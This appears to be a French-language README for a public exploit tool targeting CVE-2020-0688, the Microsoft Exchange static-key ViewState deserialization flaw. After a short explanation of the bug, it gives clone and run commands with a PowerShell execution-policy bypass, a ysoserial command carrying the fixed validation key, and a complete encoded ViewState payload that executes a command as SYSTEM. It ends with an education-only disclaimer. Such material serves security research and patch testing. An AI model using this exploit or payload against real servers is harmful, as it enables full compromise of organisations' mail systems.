
Exécution de code à distance sur Microsoft Exchange Server via des clés cryptographiques fixes
Une vulnérabilité d'exécution de code à distance existe dans Microsoft Exchange Server lorsque le serveur ne parvient pas à créer correctement des clés uniques lors de l'installation.
La connaissance de la clé de validation permet à un utilisateur authentifié disposant d'une boîte aux lettres de passer des objets arbitraires à désérialiser par l'application web, qui s'exécute en tant que SYSTEM.
Le bogue se trouve dans le composant Exchange Control Panel (ECP). La nature du bogue est assez simple. Au lieu d'avoir des clés générées aléatoirement pour chaque installation, toutes les installations de Microsoft Exchange Server ont les mêmes valeurs validationKey et decryptionKey dans web.config. Ces clés sont utilisées pour sécuriser ViewState. ViewState est une donnée côté serveur que les applications web ASP.NET stockent au format sérialisé chez le client. Le client renvoie ces données au serveur via le paramètre de requête __VIEWSTATE.
En raison de l'utilisation de clés statiques, un attaquant authentifié peut tromper le serveur en le forçant à désérialiser des données ViewState malveillantes. Avec l'aide de YSoSerial.net, un attaquant peut exécuter du code .NET arbitraire sur le serveur dans le contexte de l'application web Exchange Control Panel, qui s'exécute en tant que SYSTEM. (Source)
Grâce à ces instructions, vous pouvez obtenir une copie du projet et l'exécuter sur votre machine locale à des fins de développement et de test.
git clone https://github.com/MrTiz/CVE-2020-0688.git
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url <url> -Username <username> -Password <password> -Command <command> -YsoserialPath <ysoserialpath>
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url 'https://localhost' -Username 'domain\username' -Password 'REDACTED' -Command 'powershell whoami > C:/whoami.txt' -YsoserialPath 'C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe'
[*] Start to exploit...
[+] Login url: https://localhost:443/owa/auth.owa
[*] Status code: 200
[+] Login successfully!
[*] Tring to get __VIEWSTATEGENERATOR...
[+] Done! __VIEWSTATEGENERATOR: B97B4E27
[*] Tring to get ASP.NET_SessionId...
[+] Done! ASP.NET_SessionId: 624abfff-85b6-4357-be8c-18a931cad256
C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell whoami > C:/whoami.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="624abfff-85b6-4357-be8c-18a931cad256" --islegacy --isdebug
[+] Exp url: https://localhost:443/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyywYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADtBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BcG93ZXJzaGVsbDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BIndob2FtaSAmZ3Q7IEM6L3dob2FtaS50eHQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgviru9bDCgMPT0snH0s0u%2BA6J37Fg%3D%3D
[*] Auto trigger payload...
[+] Status code: 500, Maybe success!
Les contributions sont ce qui fait de la communauté open source un si bon endroit pour apprendre, inspirer et créer. Toute contribution que vous pouvez apporter est grandement appréciée.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Cet exploit a été développé et publié à des fins éducatives et de recherche uniquement. L'auteur décline toute responsabilité en cas d'utilisation illégale. Utilisez-le à vos propres risques et uniquement contre des systèmes pour lesquels vous êtes autorisé à le tester.
Ce projet est sous licence GNU General Public License v3.0 - voir le fichier LICENSE pour plus de détails.